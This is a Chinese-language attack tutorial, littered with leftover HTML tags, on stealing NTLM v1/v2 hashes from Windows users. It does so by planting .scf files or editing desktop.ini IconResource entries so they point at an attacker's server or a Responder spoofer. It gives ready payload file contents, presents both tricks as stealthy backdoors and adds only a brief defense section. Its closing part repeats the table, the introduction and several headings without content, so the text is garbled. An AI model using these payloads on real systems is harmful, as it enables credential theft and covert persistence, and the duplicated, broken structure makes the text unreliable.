利用配置文件重定向获取NTLM v1\/v2 Hash攻击技术详解<\/h1>

0x00 前言<\/h2>
本文详细总结了利用SCF文件和修改文件夹图标两种方法强制客户端访问伪造的文件服务器或广播请求，从而获取NTLM v1\/v2 Hash的技术。相比直接监听445端口，这种方法可以获取已经认证过的用户的Hash。<\/p>

0x01 技术简介<\/h2>

主要介绍两种攻击方法：<\/p>

添加SCF文件强制用户访问伪造的文件服务器<\/li>

修改文件夹图标强制用户访问伪造的文件服务器<\/li> <\/ol>

0x02 SCF文件简介<\/h2>

SCF文件是"Windows资源管理器命令"文件，是一种可执行文件。关键特性：<\/p>

包含IconFile属性，可填写UNC路径<\/li>
资源管理器访问时会自动执行该文件<\/li>

可用于重定向客户端访问<\/li> <\/ul>

0x03 利用SCF文件强制访问伪造文件服务器<\/h2>

测试环境<\/h3>

已控"文件"服务器：192.168.20.3 (Win2008)<\/li>
陷阱服务器：192.168.20.141 (Win7)<\/li>

客户端：192.168.20.2 (Win2012)<\/li> <\/ul>

攻击步骤<\/h3>

在文件服务器共享目录中创建test.scf文件，内容如下：<\/li> <\/ol>

[Shell]
Command=2
IconFile=\\192.168.20.141\SYS\test.ico
[Taskbar]
Command=ToggleDesktop
<\/code><\/pre>


陷阱服务器开启抓包工具(Wireshark)<\/p>
<\/li>

客户端访问文件服务器共享目录<\/p>
<\/li>

陷阱服务器捕获客户端的NTLM认证信息<\/p>
<\/li>
<\/ol>
0x04 利用SCF文件强制访问未知目标(SMB欺骗)<\/h2>
测试环境<\/h3>

欺骗机器：192.168.20.131 (Kali)<\/li>
已控文件服务器：192.168.20.3<\/li>
客户端：192.168.20.2<\/li>
<\/ul>
攻击步骤<\/h3>

修改SCF文件内容为不存在的目标：<\/li>
<\/ol>
[Shell]
Command=2
IconFile=\\asdasdasd\SYS\test.ico
[Taskbar]
Command=ToggleDesktop
<\/code><\/pre>


Kali开启Responder等SMB欺骗工具<\/p>
<\/li>

客户端访问文件服务器共享目录<\/p>
<\/li>

Kali捕获广播的NTLM认证信息<\/p>
<\/li>
<\/ol>
0x05 SCF文件作为本机后门<\/h2>
测试环境<\/h3>


SMB欺骗测试：<\/p>

欺骗机器：192.168.20.131 (Kali)<\/li>
客户端：192.168.20.2<\/li>
<\/ul>
<\/li>

固定IP测试：<\/p>

陷阱服务器：192.168.20.141<\/li>
客户端：192.168.20.2<\/li>
<\/ul>
<\/li>
<\/ol>
攻击步骤<\/h3>

在客户端创建共享目录(如C:\T)<\/li>
在目录中放置SCF文件(内容同上)<\/li>
访问该目录即可触发NTLM认证<\/li>
非共享目录同样有效<\/li>
<\/ol>
0x06 SCF文件总结<\/h2>

可用于获取已认证用户的Hash<\/li>
可作为本机后门<\/li>
支持直接指定IP或SMB欺骗<\/li>
任意目录中的SCF文件都有效<\/li>
<\/ul>
0x07 修改文件夹图标技术简介<\/h2>
关键点：<\/p>

修改文件夹图标会生成desktop.ini文件<\/li>
该文件包含IconResource属性，可指定UNC路径<\/li>
必须使用explorer .\desktop.ini<\/code>命令编辑<\/li>
修改后图标会暂时变化，约2分钟后恢复默认<\/li>
<\/ul>
0x08 利用修改文件夹图标作为后门<\/h2>
测试环境<\/h3>


SMB欺骗测试：<\/p>

欺骗机器：192.168.20.131 (Kali)<\/li>
客户端：192.168.20.2<\/li>
<\/ul>
<\/li>

固定IP测试：<\/p>

陷阱服务器：192.168.20.141<\/li>
客户端：192.168.20.2<\/li>
<\/ul>
<\/li>
<\/ol>
攻击步骤<\/h3>

创建多层目录(如C:\T\TT\TTT)<\/li>
修改TTT文件夹的图标<\/li>
使用explorer .\desktop.ini<\/code>编辑文件<\/li>
修改IconResource为攻击目标：

SMB欺骗：IconResource=\\asdasdasd\test\SHELL32.dll,3<\/code><\/li>
固定IP：IconResource=\\192.168.20.141\test\SHELL32.dll,3<\/code><\/li>
<\/ul>
<\/li>
访问该目录即可触发认证<\/li>
<\/ol>
注意事项：<\/p>

不能直接添加新的IconResource，必须修改原有项<\/li>
图标会暂时变化，约2分钟后恢复但不影响功能<\/li>
<\/ul>
0x09 利用修改文件夹图标获取已认证用户Hash<\/h2>
方法与后门类似，区别在于：<\/p>

在已控文件服务器上设置<\/li>
客户端访问共享目录时触发<\/li>
<\/ul>
0x10 修改文件夹图标技术总结<\/h2>

比SCF文件更隐蔽<\/li>
同样支持本机后门和获取已认证用户Hash<\/li>
图标变化会暂时引起注意但很快恢复<\/li>
<\/ul>
0x11 防御措施<\/h2>


检查特殊文件：<\/p>

监控.scf文件<\/li>
检查desktop.ini中的IconResource<\/li>
<\/ul>
<\/li>

网络配置：<\/p>

无特殊需要可禁用139\/445端口<\/li>
使用Kerberos认证替代NTLM<\/li>
<\/ul>
<\/li>
<\/ol>
0x12 技术对比总结<\/h2>



特性<\/th>
SCF文件方法<\/th>
修改文件夹图标方法<\/th>
<\/tr>
<\/thead>


隐蔽性<\/td>
较低<\/td>
较高<\/td>
<\/tr>

触发条件<\/td>
访问含SCF的目录<\/td>
访问修改图标的目录<\/td>
<\/tr>

支持SMB欺骗<\/td>
是<\/td>
是<\/td>
<\/tr>

支持固定IP指定<\/td>
是<\/td>
是<\/td>
<\/tr>

可作为本机后门<\/td>
是<\/td>
是<\/td>
<\/tr>

获取已认证用户Hash<\/td>
是<\/td>
是<\/td>
<\/tr>

实施复杂度<\/td>
简单<\/td>
中等<\/td>
<\/tr>
<\/tbody>
<\/table>
两种方法各有优劣，攻击者可根据实际情况选择使用。<\/p>

特性<\/th>	SCF文件方法<\/th>	修改文件夹图标方法<\/th> <\/tr> <\/thead>
隐蔽性<\/td>	较低<\/td>	较高<\/td> <\/tr>
触发条件<\/td>	访问含SCF的目录<\/td>	访问修改图标的目录<\/td> <\/tr>
支持SMB欺骗<\/td>	是<\/td>	是<\/td> <\/tr>
支持固定IP指定<\/td>	是<\/td>	是<\/td> <\/tr>
可作为本机后门<\/td>	是<\/td>	是<\/td> <\/tr>
获取已认证用户Hash<\/td>	是<\/td>	是<\/td> <\/tr>
实施复杂度<\/td>	简单<\/td>	中等<\/td> <\/tr> <\/tbody> <\/table> 两种方法各有优劣，攻击者可根据实际情况选择使用。<\/p>

利用配置文件重定向获取NTLM v1\/v2 Hash攻击技术详解<\/h1>

0x00 前言<\/h2> 本文详细总结了利用SCF文件和修改文件夹图标两种方法强制客户端访问伪造的文件服务器或广播请求，从而获取NTLM v1\/v2 Hash的技术。相比直接监听445端口，这种方法可以获取已经认证过的用户的Hash。<\/p>

0x03 利用SCF文件强制访问伪造文件服务器<\/h2>

0x04 利用SCF文件强制访问未知目标(SMB欺骗)<\/h2>

0x05 SCF文件作为本机后门<\/h2>

0x08 利用修改文件夹图标作为后门<\/h2>

0x00 前言<\/h2>
本文详细总结了利用SCF文件和修改文件夹图标两种方法强制客户端访问伪造的文件服务器或广播请求，从而获取NTLM v1\/v2 Hash的技术。相比直接监听445端口，这种方法可以获取已经认证过的用户的Hash。<\/p>